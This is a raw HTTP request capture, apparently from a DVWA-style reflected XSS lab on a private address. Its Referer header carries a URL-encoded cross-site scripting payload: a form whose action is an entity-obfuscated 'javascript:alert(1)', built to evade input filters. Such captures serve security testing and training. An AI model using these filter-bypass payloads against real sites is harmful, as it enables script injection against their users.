GET /vulnerabilities/xss_r/?name= HTTP/1.1
Host: 10.10.3.128:2280
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cform+action%3D%22j%26%2397%3Bvascript%3Aalert%281%29%22%3E%3Cinput+type%3Dsubmit+id%3Dx%3E%3C%2Fform%3E%3Clabel+for%3Dx%3EXSS%3C%2Flabel%3E
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

